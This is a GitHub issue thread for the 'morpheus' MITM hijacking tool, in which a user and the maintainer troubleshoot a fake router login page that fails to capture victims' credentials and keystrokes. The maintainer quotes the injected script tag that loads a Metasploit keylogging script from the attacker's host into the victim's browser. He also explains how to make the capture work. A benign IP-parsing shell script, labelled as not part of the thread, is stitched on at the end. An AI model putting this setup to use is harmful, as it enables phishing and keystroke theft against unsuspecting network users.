r00t-3xp10it / morpheus

Morpheus - Automating Ettercap TCP/IP (MITM-hijacking Tool)

Modem/router login webpage not working perfectly #2

Closed spiritedwolf closed 7 years ago

spiritedwolf commented 7 years ago

Now I am testing it in OS: BackBox 4.5, Metasploit path: /opt/metasploit [I've installed it manually, community version]

[screenshot]

So now in BackBox it is showing me the router login page but not capturing credentials/keystroke[s].

r00t-3xp10it commented 7 years ago


From that screenshot I can see that your Metasploit has not connected to the link inside index.html (fake router login webpage).


This is what happens when Metasploit connects to the link (JavaScript) inside index.html: [screenshot: poc1]


Possible causes

1º - Edit var/www/html/index.html and check if the following line is present:

<script type='text/javascript' src='http://192.168.1.3:8080/support/test.js'></script></body>

If that line is present in index.html it means that you have not loaded the webpage properly and the Metasploit server did not receive the connection from the client (URL link)...


2º - Another possible cause is that my script stores your IP address with an 'empty space' in the variable:

<script type='text/javascript' src='http://192.168.1.3 :8080/support/test.js'></script></body>

If there is an empty space in the JavaScript tag then it means that the morpheus function that stores your IP address is badly written; replace that value (BackBox) then: [screenshot: poc1]

"And report back to me what is the new backbox configuration".


3º - Another possible cause is that you must wait for the msfconsole to load before trying to access any domain (domains with .com) in the target browser.



HINT: only when Metasploit identifies the 'client' can it start recording keystrokes... [screenshot: poc2]


spiritedwolf commented 7 years ago

Well, you are right, the problem is with the 2nd one. [Blank spaces] [screenshot]

And I just found one way but it's not properly showing me plain text. [screenshot]

So any suggestions?

Edit: Done, you can use this:

ifconfig | grep "inet " | grep -Fv 127.0.0.1 | awk '{print $2}' | cut -d ':' -f2

for BackBox. [screenshot]

r00t-3xp10it commented 7 years ago

I see now (BackBox ifconfig conf), and I can tell you that the right bash command is:

ifconfig $InT3R | egrep -w 'inet' | awk {'print $2'} | cut -d ':' -f2

It's the same conf that Ubuntu uses, so replace the BackBox command with the Ubuntu one.

spiritedwolf commented 7 years ago

Ohh ok, I get it.
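
Added example (not part of the thread or of the morpheus code base): the pipeline from the last comment run over constructed samples of the two common ifconfig output styles, followed by a check that rejects the stray-space value described under cause 2º. The function names `extract_ip` and `is_clean_ipv4` and the sample text are assumptions made for illustration.

```sh
#!/bin/sh
# Constructed samples (not captured from a real host) of the two ifconfig styles.
OLD_STYLE='eth0      Link encap:Ethernet  HWaddr 00:00:00:00:00:00
          inet addr:192.168.1.3  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::1/64 Scope:Link'
NEW_STYLE='eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.3  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::1  prefixlen 64  scopeid 0x20<link>'

# extract_ip (hypothetical name): the thread's pipeline, reading ifconfig text
# from stdin. grep -w keeps "inet" lines and skips "inet6"; awk takes field 2;
# cut drops an "addr:" prefix when present and passes the line through otherwise.
extract_ip() {
    grep -w 'inet' | awk '{print $2}' | cut -d ':' -f2
}

# is_clean_ipv4 (hypothetical name): succeed only for a bare dotted quad.
# Any other character, including the trailing space from cause 2, is rejected.
is_clean_ipv4() {
    case $1 in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    old_ifs=$IFS
    IFS=.
    set -- $1            # split on dots into positional parameters
    IFS=$old_ifs
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        case $octet in ''|????*) return 1 ;; esac
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# Demo: both styles give the same address; a value with a space fails the check.
for sample in "$OLD_STYLE" "$NEW_STYLE"; do
    ip=$(printf '%s\n' "$sample" | extract_ip)
    if is_clean_ipv4 "$ip"; then echo "ok:  [$ip]"; else echo "bad: [$ip]"; fi
done
if is_clean_ipv4 "192.168.1.3 "; then echo "ok"; else echo "bad: [192.168.1.3 ]"; fi
```

Running the check before the address is written into any generated file turns the silent failure from cause 2º into an immediate, visible error.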